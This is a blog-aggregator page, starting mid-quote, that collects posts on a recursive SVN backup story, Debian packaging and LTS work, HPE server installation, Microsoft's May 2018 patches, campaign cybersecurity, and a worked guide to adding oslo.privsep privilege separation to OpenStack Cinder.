We don’t have to come up with rules. We just have to wait for the insurance companies to show up at these places that they’re writing policies for and say, “Tell me again, why we should be writing you a policy when you’ve warehoused all of this incredibly toxic material that we’re all pretty sure you’re going to breach someday, and whose liability is effectively unbounded?” They’re going to make the companies discipline themselves.

Worse Than FailureExponential Backup

The first day of a new job is always an adjustment. There's a fine line between explaining that you're unused to a procedure and constantly saying "At my old company...". After all, nobody wants to be that guy, right? So you proceed with caution, trying to learn before giving advice.

But some things warrant the extra mile. When Samantha started her tenure at a mid-sized firm, it all started out fine. She got a computer right away, which is a nice plus. She met the team, got settled into a desk, and was given a list of passwords and important URLs to get situated. The usual stuff.

After changing her Windows password, she decided to start by browsing the source code repository. This company used Subversion, so she went and downloaded the whole repo so she could see the structure. It took a while, so she got up and got some coffee; when she got back, it had finished, and she was able to see the total size: 300 GB. That's... weird. Really weird. Weirder still, when she glanced over the commit history, it only dated back a year or so.

What could be taking so much space? Were they storing some huge binaries tucked away someplace that the code depended on? She didn't want to make waves, but this just seemed so... inefficiently huge. Now curious, she opened the repo, browsing the folder structure.

Subversion bases everything on folder structure; there is only really one "branch" in Git's thinking, but you can check out any subfolder without taking the whole repository. Inside of each project directory was a layout that is common to SVN repos: a folder called "branches", a folder called "tags", and a folder called "trunk" (Subversion's primary branch). In the branches directory there were folders called "fix" and "feature", and in each of those there were copies of the source code stored under the names of the branches. Under normal work, she'd start her checkout from one of those branch folders, thus only pulling down the code for her branch, and merge into the "trunk" copy when she was all done.

But there was one folder she didn't anticipate: "backups". Backups? But... this is version control. We can revert to an earlier version any time we want. What are the backups for? I must be misunderstanding. She opened one and was promptly horrified to find a series of zip files, dated monthly, all at revision 1.

Now morbidly curious, Samantha opened one of these zips. The top level folder inside the zip was the name of the project; under that, she found branches, tags, trunk. No way. They can't have-- She clicked in, and there it was, plain as day: another backups folder. And inside? Every backup older than the one she'd clicked. Each backup included, presumably, every backup prior to that, meaning that in the backup for October, the backup from January was included nine times, the backup from February eight times, and so on and so forth. Within two years, a floppy disk worth of code would fill a terabyte drive.

Samantha asked her boss, "What will you do when the repo gets too big to be downloaded onto your hard drive?

His response was quick and entirely serious: "Well, we back it up, then we make a new one."

[Advertisement] ProGet supports your applications, Docker containers, and third-party packages, allowing you to enforce quality standards across all components. Download and see how!

Planet DebianAlexandre Viau: Introducing Autodeb

Autodeb is a new service that will attempt to automatically update Debian packages to newer upstream versions or to backport them. Resulting packages will be distributed in apt repositories.

I am happy to annnounce that I will be developing this new service as part of Google Summer of Code 2018 with Lucas Nussbaum as a mentor.

The program is currently nearing the end of the “Community Bonding” period, where mentors and their mentees discuss on the details of the projects and try to set objectives.

Main goal

Automatically create and distribute package updates/backports

This is the main objective of Autodeb. These unofficial packages can be an alternative for Debian users that want newer versions of software faster than it is available in Debian.

The results of this experiment will also be interesting when looking at backports. If successful, it could be that a large number of packages are backportable automatically, brigning even more options for stable (or even oldstable) users.

We also hope that the information that is produced by the system can be used by Debian Developers. For example, Debian Developers may be more tempted to support backports of their packages if they know that it already builds and that autopkgtests passes.

Other goals

Autodeb will be composed of infrastructure that is capable to build and test a large number of packages. We intend to build it with two secondary goals in mind:

Test packages that were built by developers before they upload it to the archive

We intend to add a self-service interface so that our testing infrastructure can be used for other purposes than automatically updating packages. This can empower Debian Developers by giving them easy access to more rigorous testing before they upload a package to the archive. For more more details on this, see my previous testeduploads proposal.

Archive rebuids / modifying the build and test environment

We would like to allow for building packages with a custom environment. For example, with a new version of GCC or with a set of packages. Ideally, this would also be a self-service interface where Developers can setup their environement and then upload packages for testing. Istead of individual package uploads, the input of packages to build could be a whole apt repository from which all source packages would be downloaded and rebuilt, with filters to select the packages to include or exclude.

What’s next

The next phase of Google Summer of Code is the coding period, it begins of May 14 and ends on August 6. However, there area a number of areas where work has already begun:

  1. Main repository: code for the master and the worker components of the service, written in golang.
  2. Debian packaging: Debian packaging autodeb. Contains scripts that will publish packages to pages.debian.net.
  3. Ansible scripts: this repository contains ansible scripts to provision the infrastructure at auto.debian.net.

Status update at DebConf

I have submitted a proposal for a talk on Autodeb at DebConf. By that time, the project should have evolved from idea to prototype and it will be interesting to discuss the things that we have learned:

  • How many packages can we successfully build?
  • How many of these packages fail tests?

If all goes well, it will also be an opportunity to officialy present our self-service interface to the public so that the community can start using it to test packages.

In the meantime, feel free to get in touch with us by email, on OFTC at #autodeb, or via issues on salsa.

,

Krebs on SecurityMicrosoft Patch Tuesday, May 2018 Edition

Microsoft today released a bundle of security updates to fix at least 67 holes in its various Windows operating systems and related software, including one dangerous flaw that Microsoft warns is actively being exploited. Meanwhile, as it usually does on Microsoft’s Patch Tuesday — the second Tuesday of each month — Adobe has a new Flash Player update that addresses a single but critical security weakness.

First, the Flash Tuesday update, which brings Flash Player to v. 29.0.0.171. Some (present company included) would argue that Flash Player is itself “a single but critical security weakness.” Nevertheless, Google Chrome and Internet Explorer/Edge ship with their own versions of Flash, which get updated automatically when new versions of these browsers are made available.

You can check if your browser has Flash installed/enabled and what version it’s at by pointing your browser at this link. Adobe is phasing out Flash entirely by 2020, but most of the major browsers already take steps to hobble Flash. And with good reason: It’s a major security liability.

Google Chrome blocks Flash from running on all but a handful of popular sites, and then only after user approval. Disabling Flash in Chrome is simple enough. Paste “chrome://settings/content” into a Chrome browser bar and then select “Flash” from the list of items. By default it should be set to “Ask first” before running Flash, although users also can disable Flash entirely here or whitelist/blacklist specific sites. If you spot an upward pointing arrow to the right of the address bar in Chrome, that means there’s an update to the browser available, and it’s time to restart Chrome.

For Windows users with Mozilla Firefox installed, the browser prompts users to enable Flash on a per-site basis.

Through the end of 2017 and into 2018, Microsoft Edge will continue to ask users for permission to run Flash on most sites the first time the site is visited, and will remember the user’s preference on subsequent visits. Microsoft users will need to install this month’s batch of patches to get the latest Flash version for IE/Edge, where most of the critical updates in this month’s patch batch reside.

According to security vendor Qualys, one Microsoft patch in particular deserves priority over others in organizations that are testing updates before deploying them: CVE-2018-8174 involves a problem with the way the Windows scripting engine handles certain objects, and Microsoft says this bug is already being exploited in active attacks.

Some other useful sources of information on today’s updates include the Zero Day Initiative and Bleeping Computer. And of course there is always the Microsoft Security Update Guide.

As always, please feel free to leave a comment below if you experience any issues applying any of these updates.

Rondam RamblingsA quantum mechanics puzzle, part deux

This post is (part of) the answer to a puzzle I posed here.  Read that first if you haven't already. To make this discussion concrete, let's call the time it takes for light to traverse the short (or Small) arm of the interferometer Ts, the long (or Big) arm Tb (because Tl looks too much like T1). So there are five interesting cases here.  Let's start with the easy one: we illuminate the

Planet DebianSven Hoexter: Debian/stretch on HPE DL360 gen10

We received our first HPE gen10 systems, a bunch of DL360, and experienced a few caveats while setting up Debian/stretch.

PXE installation

While our DL120 gen9 announced themself as "X86-64_EFI" (client architecture 00009), the DL360 gen10 use "BC_EFI" (client architecture 00007) in the BOOTP/DHCP protocol option 93. Since we use dnsmasq as DHCP and tftp server we rely on tags like this:

# new style UEFI PXE
dhcp-boot=bootnetx64.efi
# client arch 00009
pxe-service=tag:s1,X86-64_EFI, "Boot UEFI X86-64_EFI", bootnetx64.efi
# client arch 00007
pxe-service=tag:s2,BC_EFI, "Boot UEFI BC_EFI", bootnetx64.efi

dhcp-host=set:s1,AB:CD:37:3A:2E:FG,192.168.1.5,host-001
dhcp-host=set:s2,AB:CD:37:3A:2H:IJ,192.168.1.6,host-002

This is easy to spot with wireshark once you understand what you're looking for.

debian-installer

For some reason, and I heard some rumours that this is a known bug, I had to disable USB support and the SD-card reader in the interface formerly known as BIOS. Otherwise the installer detects the first volume of the P408i raid controller as "/dev/sdb" instead of "/dev/sda".

Network interfaces depend highly on your actual setup. Booting from the additional 10G interfaces worked out of the box, they're detected with reliable names as eno5 and eno6.

HPE MCP

So far we relied on the hp-health and ssacli (formerly hpssacli) packages from the HPE MCP. Currently those tools seem to not support Gen10 systems. I'm currently trying to find out what the alternative is to monitor the health state of the system components. At least for hp-health it's mentioned that only up to Gen9 is support.

That's what I receive from ssacli:

=> ctrl all show status

HPE P408i-a SR Gen10 in Slot 0 (Embedded)

APPLICATION UPGRADE REQUIRED: This controller has been configured with a more
                          recent version of software.
                          To prevent data loss, configuration changes to
                          this controller are not allowed.
                          Please upgrade to the latest version to be able
                          to continue to configure this controller.

That's what I found in our logs from the failed start of hpasmlited:

hpasmlited[31952]: check_ilo2: BMC Returned Error:  ccode  0x0,  Req. Len:  15, Resp. Len:  21

auto configuration

If you're looking into automatic configuration of those systems you'll have to look for Redfish. API documentation for ilo5 can be found at https://hewlettpackard.github.io/ilo-rest-api-docs/ilo5. Since it's not clear how many of those systems we will actually setup, I'm so far a bit reluctant to automate the setup further.

Planet DebianMarkus Koschany: My Free Software Activities in April 2018

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in Java, Games and LTS topics, this might be interesting for you.

Debian Games

  • I adopted childsplay, a suite of educational games for young children. I triaged all open bugs and thanks to a very responsive upstream developer the game is back in testing again now.
  • I did a QA upload for pax-britannica to fix #825673 and #718884 and updated the packaging.
  • In the same vein I did two NMUs for animals and acm and fixed RC bugs #875547 and #889530. Later I contacted the release team to get the fix for animals into Stretch too.
  • I packaged new upstream releases of extremetuxracer, adonthell, renpy and pygame-sdl2.
  • I sponsored and reviewed new versions of tanglet, connectagram and cutemaze for Innocent de Marchi.
  • I released version 2.3 of debian-games, a collection of metapackages to make it easier to find and install certain types of games.
  • I backported the latest release of freeciv to Stretch.
  • Finally I could resolve the RC bugs in morris and grhino and both games are part of Buster again.

Debian Java

Debian LTS

This was my twenty-sixth month as a paid contributor and I have been paid to work 16,25 hours on Debian LTS, a project started by Raphaël Hertzog. In that time I did the following:

  • From 16.04.2018 until 22.04.2018 I was in charge of our LTS frontdesk. I investigated and triaged CVE in bouncycastle, jruby, typo3-src, imagemagick, pegl, ocaml, radare2, movabletype-opensource, cacti, ghostscript, glusterfs, jasperreports, xulrunner, phpmyadmin, gunicorn, psensor, nasm and lucene-solr.
  • DLA-1352-1. Issued a security update for jruby fixing 1 CVE.
  • DLA-1361-1. Issued a security update for psensor fixing 1 CVE.
  • DLA-1363-1. Issued a security update for ghostscript fixing 1 CVE.
  • DLA-1366-1. Issued a security update for wordpress fixing 2 CVE.
  • DSA-4190-1. Prepared the security update for jackson-databind in Jessie fixing 1 CVE.
  • DSA-4194-1. Prepared the security update for lucene-solr in Jessie fixing 1 CVE.
  • Prepared a security update for imagemagick in Jessie fixing 8 CVE. At the moment it is pending review by the security team and will be released soon.
  • Prepared and uploaded a point-update for faad2 in Jessie and Stretch that addresses 11 security vulnerabilities. (#897369)
  • Prepared a security update for php5 in Wheezy. This one will be released soon. (DLA-1373-1)

Misc

  • I filed wishlist bugs against tracker.debian.org (#897225 and #897227) and requested a feature to allow users to override certain metainformation like VCS-URLs. In the past years we changed VCS addresses multiple times which always requires a source upload. In my opinion this is a design flaw and highly inefficient and such a change in tracker would make it possible to drop the fields from our team maintained packages.

Thanks for reading and see you next time.

Planet DebianReproducible builds folks: Reproducible Builds: Weekly report #158

Here’s what happened in the Reproducible Builds effort between Sunday April 29 and Saturday May 5 2018:

Packages reviewed and fixed, and bugs filed

Misc.

This week’s edition was written by Chris Lamb & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Mark ShuttleworthCue the Cosmic Cuttlefish

With our castor Castor now out for all to enjoy, and the Twitterverse delighted with the new minimal desktop and smooth snap integration, it’s time to turn our attention to the road ahead to 20.04 LTS, and I’m delighted to say that we’ll kick off that journey with the Cosmic Cuttlefish, soon to be known as Ubuntu 18.10.

Each of us has our own ideas of how the free stack will evolve in the next two years. And the great thing about Ubuntu is that it doesn’t reflect just one set of priorities, it’s an aggregation of all the things our community cares about. Nevertheless I thought I’d take the opportunity early in this LTS cycle to talk a little about the thing I’m starting to care more about than any one feature, and that’s security.

If I had one big thing that I could feel great about doing, systematically, for everyone who uses Ubuntu, it would be improving their confidence in the security of their systems and their data. It’s one of the very few truly unifying themes that crosses every use case.

It’s extraordinary how diverse the uses are to which the world puts Ubuntu these days, from the heart of the mainframe operation in a major financial firm, to the raspberry pi duck-taped to the back of a prototype something in the middle of nowhere, from desktops to clouds to connected things, we are the platform for ambitions great and small. We are stewards of a shared platform, and one of the ways we respond to that diversity is by opening up to let people push forward their ideas, making sure only that they are excellent to each other in the pushing.

But security is the one thing that every community wants – and it’s something that, on reflection, we can raise the bar even higher on.

So without further ado: thank you to everyone who helped bring about Bionic, and may you all enjoy working towards your own goals both in and out of Ubuntu in the next two years.

CryptogramThe US Is Unprepared for Election-Related Hacking in 2018

This survey and report is not surprising:

The survey of nearly forty Republican and Democratic campaign operatives, administered through November and December 2017, revealed that American political campaign staff -- primarily working at the state and congressional levels -- are not only unprepared for possible cyber attacks, but remain generally unconcerned about the threat. The survey sample was relatively small, but nevertheless the survey provides a first look at how campaign managers and staff are responding to the threat.

The overwhelming majority of those surveyed do not want to devote campaign resources to cybersecurity or to hire personnel to address cybersecurity issues. Even though campaign managers recognize there is a high probability that campaign and personal emails are at risk of being hacked, they are more concerned about fundraising and press coverage than they are about cybersecurity. Less than half of those surveyed said they had taken steps to make their data secure and most were unsure if they wanted to spend any money on this protection.

Security is never something we actually want. Security is something we need in order to avoid what we don't want. It's also more abstract, concerned with hypothetical future possibilities. Of course it's lower on the priorities list than fundraising and press coverage. They're more tangible, and they're more immediate.

This is all to the attackers' advantage.

Worse Than FailureYes == No

For decades, I worked in an industry where you were never allowed to say no to a user, no matter how ridiculous the request. You had to suck it up and figure out a way to deliver on insane requests, regardless of the technical debt they inflicted.

Canada Stop sign.svg

Users are a funny breed. They say things like I don't care if the input dialog you have works; the last place I worked had a different dialog to do the same thing, and I want that dialog here! With only one user saying stuff like that, it's semi-tolerable. When you have 700+ users and each of them wants a different dialog to do the same thing, and nobody in management will say no, you need to start creating table-driven dialogs (x-y coordinates, width, height, label phrasing, field layout within the dialog, different input formats, fonts, colors and so forth). Multiply that by the number of dialogs in your application and it becomes needlessly pointlessly impossibly difficult.

But it never stops there. Often, one user will request that you move a field from another dialog onto their dialog - just for them. This creates all sorts of havoc with validation logic. Multiply it by hundreds of users and you're basically creating a different application for each of them - each with its own validation logic, all in the same application.

After just a single handful of users demanding changes like this, it can quickly become a nightmare. Worse, once it starts, the next user to whom you say no tells you that you did it for the other guy and so you have to do it for them too! After all, each user is the most important user, right?

It doesn't matter that saying no is the right thing to do. It doesn't matter that it will put a zero-value load on development and debugging time. It doesn't matter that sucking up development time to do it means there are less development hours for bug fixes or actual features.

When management refuses to say no, it can turn your code into a Pandora's-Box-o-WTF™

However, there is hope. There is a way to tell the users no without actually saying no. It's by getting them to say it for you and then withdrawing their urgent, can't-live-without-it, must-have-or-the-world-will-end request.

You may ask how?

The trick is to make them see the actual cost of implementing their teeny tiny little feature.

Yes, we can add that new button to provide all the functionality of Excel in an in-app
calculator, but it will take x months (years) to do it, AND it will push back all of the
other features in the queue. Shall I delay the next release and the other feature requests
so we can build this for you, or would you like to schedule it for a future release?

Naturally you'll have to answer questions like "But it's just a button; why would it take that much effort?"

This is a good thing because it forces them down the rabbit hole into your world where you are the expert. Now you get to explain to them the realities of software development, and the full cost of their little request.

Once they realize the true cost that they'd have to pay, the urgency of the request almost always subsides to nice to have and gets pushed forward so as to not delay the scheduled release.

And because you got them to say it for you, you didn't have to utter the word no.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

Planet Linux AustraliaMichael Still: Adding oslo privsep to a new project, a worked example

Share

You’ve decided that using sudo to run command lines as root is lame and that it is time to step up and do things properly. How do you do that? Well, here’s a simple guide to adding oslo privsep to your project!

In a previous post I showed you how to add a new method that ran with escalated permissions. However, that’s only helpful if you already have privsep added to your project. This post shows you how to do that thing to your favourite python project. In this case we’ll use OpenStack Cinder as a worked example.

Note that Cinder already uses privsep because of its use of os-brick, so the instructions below skip adding oslo.privsep to requirements.txt. If your project has never ever used privsep at all, you’ll need to add a line like this to requirements.txt:

oslo.privsep

For reference, this post is based on OpenStack review 566,479, which I wrote as an example of how to add privsep to a new project. If you’re after a complete worked example in a more complete form than this post then the review might be useful to you.

As a first step, let’s add the code we’d want to write to actually call something with escalated permissions. In the Cinder case I chose the cgroups throttling code for this example. So first off we’d need to create the privsep directory with the relevant helper code:

diff --git a/cinder/privsep/__init__.py b/cinder/privsep/__init__.py
new file mode 100644
index 0000000..7f826a8
--- /dev/null
+++ b/cinder/privsep/__init__.py
@@ -0,0 +1,32 @@
+# Copyright 2016 Red Hat, Inc
+# Copyright 2017 Rackspace Australia
+# Copyright 2018 Michael Still and Aptira
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may
+# not use this file except in compliance with the License. You may obtain
+# a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
+# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
+# License for the specific language governing permissions and limitations
+# under the License.
+
+"""Setup privsep decorator."""
+
+from oslo_privsep import capabilities
+from oslo_privsep import priv_context
+
+sys_admin_pctxt = priv_context.PrivContext(
+ 'cinder',
+ cfg_section='cinder_sys_admin',
+ pypath=__name__ + '.sys_admin_pctxt',
+ capabilities=[capabilities.CAP_CHOWN,
+ capabilities.CAP_DAC_OVERRIDE,
+ capabilities.CAP_DAC_READ_SEARCH,
+ capabilities.CAP_FOWNER,
+ capabilities.CAP_NET_ADMIN,
+ capabilities.CAP_SYS_ADMIN],
+)

This code defines the permissions that our context (called cinder_sys_admin in this case) has. These specific permissions in the example above should correlate with those that you’d get if you ran a command with sudo. There was a bit of back and forth about what permissions to use and how many contexts to have while we were implementing privsep in OpenStack Nova, but we’ll discuss those in a later post.

Next we need the code that actually does the privileged thing:

diff --git a/cinder/privsep/cgroup.py b/cinder/privsep/cgroup.py
new file mode 100644
index 0000000..15d47e0
--- /dev/null
+++ b/cinder/privsep/cgroup.py
@@ -0,0 +1,35 @@
+# Copyright 2016 Red Hat, Inc
+# Copyright 2017 Rackspace Australia
+# Copyright 2018 Michael Still and Aptira
+#
+#    Licensed under the Apache License, Version 2.0 (the "License"); you may
+#    not use this file except in compliance with the License. You may obtain
+#    a copy of the License at
+#
+#         http://www.apache.org/licenses/LICENSE-2.0
+#
+#    Unless required by applicable law or agreed to in writing, software
+#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
+#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
+#    License for the specific language governing permissions and limitations
+#    under the License.
+
+"""
+Helpers for cgroup related routines.
+"""
+
+from oslo_concurrency import processutils
+
+import cinder.privsep
+
+
+@cinder.privsep.sys_admin_pctxt.entrypoint
+def cgroup_create(name):
+    processutils.execute('cgcreate', '-g', 'blkio:%s' % name)
+
+
+@cinder.privsep.sys_admin_pctxt.entrypoint
+def cgroup_limit(name, rw, dev, bps):
+    processutils.execute('cgset', '-r',
+                         'blkio.throttle.%s_bps_device=%s %d' % (rw, dev, bps),
+                         name)

Here we just provide two methods which manipulate cgroups. That allows us to make this change to the throttling implementation in Cinder:

diff --git a/cinder/volume/throttling.py b/cinder/volume/throttling.py
index 39cbbeb..3c6ddaa 100644
--- a/cinder/volume/throttling.py
+++ b/cinder/volume/throttling.py
@@ -22,6 +22,7 @@ from oslo_concurrency import processutils
 from oslo_log import log as logging
 
 from cinder import exception
+import cinder.privsep.cgroup
 from cinder import utils
 
 
@@ -65,8 +66,7 @@ class BlkioCgroup(Throttle):
         self.dstdevs = {}
 
         try:
-            utils.execute('cgcreate', '-g', 'blkio:%s' % self.cgroup,
-                          run_as_root=True)
+            cinder.privsep.cgroup.cgroup_create(self.cgroup)
         except processutils.ProcessExecutionError:
             LOG.error('Failed to create blkio cgroup \'%(name)s\'.',
                       {'name': cgroup_name})
@@ -81,8 +81,7 @@ class BlkioCgroup(Throttle):
 
     def _limit_bps(self, rw, dev, bps):
         try:
-            utils.execute('cgset', '-r', 'blkio.throttle.%s_bps_device=%s %d'
-                          % (rw, dev, bps), self.cgroup, run_as_root=True)
+            cinder.privsep.cgroup.cgroup_limit(self.cgroup, rw, dev, bps)
         except processutils.ProcessExecutionError:
             LOG.warning('Failed to setup blkio cgroup to throttle the '
                         'device \'%(device)s\'.', {'device': dev})

These last two snippets should be familiar from the previous post about pivsep in this series. Finally for the actual implementation of privsep, we need to make sure that rootwrap has permissions to start the privsep helper daemon. You’ll get one daemon per unique security context, but in this case we only have one of those so we’ll only need one rootwrap entry. Note that I also remove the previous rootwrap entries for cgset and cglimit while I’m here.

diff --git a/etc/cinder/rootwrap.d/volume.filters b/etc/cinder/rootwrap.d/volume.filters
index abc1517..d2d1720 100644
--- a/etc/cinder/rootwrap.d/volume.filters
+++ b/etc/cinder/rootwrap.d/volume.filters
@@ -43,6 +43,10 @@ lvdisplay4: EnvFilter, env, root, LC_ALL=C, LVM_SYSTEM_DIR=, LVM_SUPPRESS_FD_WAR
 # This line ties the superuser privs with the config files, context name,
 # and (implicitly) the actual python code invoked.
 privsep-rootwrap: RegExpFilter, privsep-helper, root, privsep-helper, --config-file, /etc/(?!\.\.).*, --privsep_context, os_brick.privileged.default, --privsep_sock_path, /tmp/.*
+
+# Privsep calls within cinder iteself
+privsep-rootwrap-sys_admin: RegExpFilter, privsep-helper, root, privsep-helper, --config-file, /etc/(?!\.\.).*, --privsep_context, cinder.privsep.sys_admin_pctxt, --privsep_sock_path, /tmp/.*
+
 # The following and any cinder/brick/* entries should all be obsoleted
 # by privsep, and may be removed once the os-brick version requirement
 # is updated appropriately.
@@ -93,8 +97,6 @@ ionice_1: ChainingRegExpFilter, ionice, root, ionice, -c[0-3], -n[0-7]
 ionice_2: ChainingRegExpFilter, ionice, root, ionice, -c[0-3]
 
 # cinder/volume/utils.py: setup_blkio_cgroup()
-cgcreate: CommandFilter, cgcreate, root
-cgset: CommandFilter, cgset, root
 cgexec: ChainingRegExpFilter, cgexec, root, cgexec, -g, blkio:\S+
 
 # cinder/volume/driver.py

And because we’re not bad people we’d of course write a release note about the changes we’ve made…

diff --git a/releasenotes/notes/privsep-rocky-35bdfe70ed62a826.yaml b/releasenotes/notes/privsep-rocky-35bdfe70ed62a826.yaml
new file mode 100644
index 0000000..e78fb00
--- /dev/null
+++ b/releasenotes/notes/privsep-rocky-35bdfe70ed62a826.yaml
@@ -0,0 +1,13 @@
+---
+security:
+    Privsep transitions. Cinder is transitioning from using the older style
+    rootwrap privilege escalation path to the new style Oslo privsep path.
+    This should improve performance and security of Nova in the long term.
+  - |
+    privsep daemons are now started by Cinder when required. These daemons can
+    be started via rootwrap if required. rootwrap configs therefore need to
+    be updated to include new privsep daemon invocations.
+upgrade:
+  - |
+    The following commands are no longer required to be listed in your rootwrap
+    configuration: cgcreate; and cgset.

This code will now work. However, we’ve left out one critical piece of the puzzle — testing. If this code was uploaded like this, it would fail in the OpenStack gate, even though it probably passed on your desktop. This is because many of the gate jobs are setup in such a way that they can’t run rootwrapped commands, which in this case means that the rootwrap daemon won’t be able to start.

I found this quite confusing in Nova when I was implementing things and had missed a step. So I wrote a simple test fixture that warns me when I am being silly:

diff --git a/cinder/test.py b/cinder/test.py
index c8c9e6c..a49cedb 100644
--- a/cinder/test.py
+++ b/cinder/test.py
@@ -302,6 +302,9 @@ class TestCase(testtools.TestCase):
         tpool.killall()
         tpool._nthreads = 20
 
+        # NOTE(mikal): make sure we don't load a privsep helper accidentally
+        self.useFixture(cinder_fixtures.PrivsepNoHelperFixture())
+
     def _restore_obj_registry(self):
         objects_base.CinderObjectRegistry._registry._obj_classes = \
             self._base_test_obj_backup
diff --git a/cinder/tests/fixtures.py b/cinder/tests/fixtures.py
index 6e275a7..79e0b73 100644
--- a/cinder/tests/fixtures.py
+++ b/cinder/tests/fixtures.py
@@ -1,4 +1,6 @@
 # Copyright 2016 IBM Corp.
+# Copyright 2017 Rackspace Australia
+# Copyright 2018 Michael Still and Aptira
 #
 #    Licensed under the Apache License, Version 2.0 (the "License"); you may
 #    not use this file except in compliance with the License. You may obtain
@@ -21,6 +23,7 @@ import os
 import warnings
 
 import fixtures
+from oslo_privsep import daemon as privsep_daemon
 
 _TRUE_VALUES = ('True', 'true', '1', 'yes')
 
@@ -131,3 +134,29 @@ class WarningsFixture(fixtures.Fixture):
                     ' This key is deprecated. Please update your policy '
                     'file to use the standard policy values.')
         self.addCleanup(warnings.resetwarnings)
+
+
+class UnHelperfulClientChannel(privsep_daemon._ClientChannel):
+    def __init__(self, context):
+        raise Exception('You have attempted to start a privsep helper. '
+                        'This is not allowed in the gate, and '
+                        'indicates a failure to have mocked your tests.')
+
+
+class PrivsepNoHelperFixture(fixtures.Fixture):
+    """A fixture to catch failures to mock privsep's rootwrap helper.
+
+    If you fail to mock away a privsep'd method in a unit test, then
+    you may well end up accidentally running the privsep rootwrap
+    helper. This will fail in the gate, but it fails in a way which
+    doesn't identify which test is missing a mock. Instead, we
+    raise an exception so that you at least know where you've missed
+    something.
+    """
+
+    def setUp(self):
+        super(PrivsepNoHelperFixture, self).setUp()
+
+        self.useFixture(fixtures.MonkeyPatch(
+            'oslo_privsep.daemon.RootwrapClientChannel',
+            UnHelperfulClientChannel))

Now if you fail to mock a privsep’ed call, then you’ll get something like this:

==============================
Failed 1 tests - output below:
==============================

cinder.tests.unit.test_volume_throttling.ThrottleTestCase.test_BlkioCgroup
--------------------------------------------------------------------------

Captured traceback:
~~~~~~~~~~~~~~~~~~~
    Traceback (most recent call last):
      File "/srv/src/openstack/cinder/.tox/py27/local/lib/python2.7/site-packages/mock/mock.py", line 1305, in patched
        return func(*args, **keywargs)
      File "cinder/tests/unit/test_volume_throttling.py", line 66, in test_BlkioCgroup
        throttle = throttling.BlkioCgroup(1024, 'fake_group')
      File "cinder/volume/throttling.py", line 69, in __init__
        cinder.privsep.cgroup.cgroup_create(self.cgroup)
      File "/srv/src/openstack/cinder/.tox/py27/local/lib/python2.7/site-packages/oslo_privsep/priv_context.py", line 206, in _wrap
        self.start()
      File "/srv/src/openstack/cinder/.tox/py27/local/lib/python2.7/site-packages/oslo_privsep/priv_context.py", line 217, in start
        channel = daemon.RootwrapClientChannel(context=self)
      File "cinder/tests/fixtures.py", line 141, in __init__
        raise Exception('You have attempted to start a privsep helper. '
    Exception: You have attempted to start a privsep helper. This is not allowed in the gate, and indicates a failure to have mocked your tests.

The last bit is the most important. The fixture we installed has detected that you’ve failed to mock a privsep’ed call and has informed you. So, the last step of all is fixing our tests. This normally involves changing where we mock, as many unit tests just lazily mock the execute() call. I try to be more granular than that. Here’s what that looked like in this throttling case:

diff --git a/cinder/tests/unit/test_volume_throttling.py b/cinder/tests/unit/test_volume_throttling.py
index 82e2645..edbc2d9 100644
--- a/cinder/tests/unit/test_volume_throttling.py
+++ b/cinder/tests/unit/test_volume_throttling.py
@@ -29,7 +29,9 @@ class ThrottleTestCase(test.TestCase):
             self.assertEqual([], cmd['prefix'])
 
     @mock.patch.object(utils, 'get_blkdev_major_minor')
-    def test_BlkioCgroup(self, mock_major_minor):
+    @mock.patch('cinder.privsep.cgroup.cgroup_create')
+    @mock.patch('cinder.privsep.cgroup.cgroup_limit')
+    def test_BlkioCgroup(self, mock_limit, mock_create, mock_major_minor):
 
         def fake_get_blkdev_major_minor(path):
             return {'src_volume1': "253:0", 'dst_volume1': "253:1",
@@ -37,38 +39,25 @@ class ThrottleTestCase(test.TestCase):
 
         mock_major_minor.side_effect = fake_get_blkdev_major_minor
 
-        self.exec_cnt = 0
+        throttle = throttling.BlkioCgroup(1024, 'fake_group')
+        with throttle.subcommand('src_volume1', 'dst_volume1') as cmd:
+            self.assertEqual(['cgexec', '-g', 'blkio:fake_group'],
+                             cmd['prefix'])
 
-        def fake_execute(*cmd, **kwargs):
-            cmd_set = ['cgset', '-r',
-                       'blkio.throttle.%s_bps_device=%s %d', 'fake_group']
-            set_order = [None,
-                         ('read', '253:0', 1024),
-                         ('write', '253:1', 1024),
-                         # a nested job starts; bps limit are set to the half
-                         ('read', '253:0', 512),
-                         ('read', '253:2', 512),
-                         ('write', '253:1', 512),
-                         ('write', '253:3', 512),
-                         # a nested job ends; bps limit is resumed
-                         ('read', '253:0', 1024),
-                         ('write', '253:1', 1024)]
-
-            if set_order[self.exec_cnt] is None:
-                self.assertEqual(('cgcreate', '-g', 'blkio:fake_group'), cmd)
-            else:
-                cmd_set[2] %= set_order[self.exec_cnt]
-                self.assertEqual(tuple(cmd_set), cmd)
-
-            self.exec_cnt += 1
-
-        with mock.patch.object(utils, 'execute', side_effect=fake_execute):
-            throttle = throttling.BlkioCgroup(1024, 'fake_group')
-            with throttle.subcommand('src_volume1', 'dst_volume1') as cmd:
+            # a nested job
+            with throttle.subcommand('src_volume2', 'dst_volume2') as cmd:
                 self.assertEqual(['cgexec', '-g', 'blkio:fake_group'],
                                  cmd['prefix'])
 
-                # a nested job
-                with throttle.subcommand('src_volume2', 'dst_volume2') as cmd:
-                    self.assertEqual(['cgexec', '-g', 'blkio:fake_group'],
-                                     cmd['prefix'])
+        mock_create.assert_has_calls([mock.call('fake_group')])
+        mock_limit.assert_has_calls([
+            mock.call('fake_group', 'read', '253:0', 1024),
+            mock.call('fake_group', 'write', '253:1', 1024),
+            # a nested job starts; bps limit are set to the half
+            mock.call('fake_group', 'read', '253:0', 512),
+            mock.call('fake_group', 'read', '253:2', 512),
+            mock.call('fake_group', 'write', '253:1', 512),
+            mock.call('fake_group', 'write', '253:3', 512),
+            # a nested job ends; bps limit is resumed
+            mock.call('fake_group', 'read', '253:0', 1024),
+            mock.call('fake_group', 'write', '253:1', 1024)])

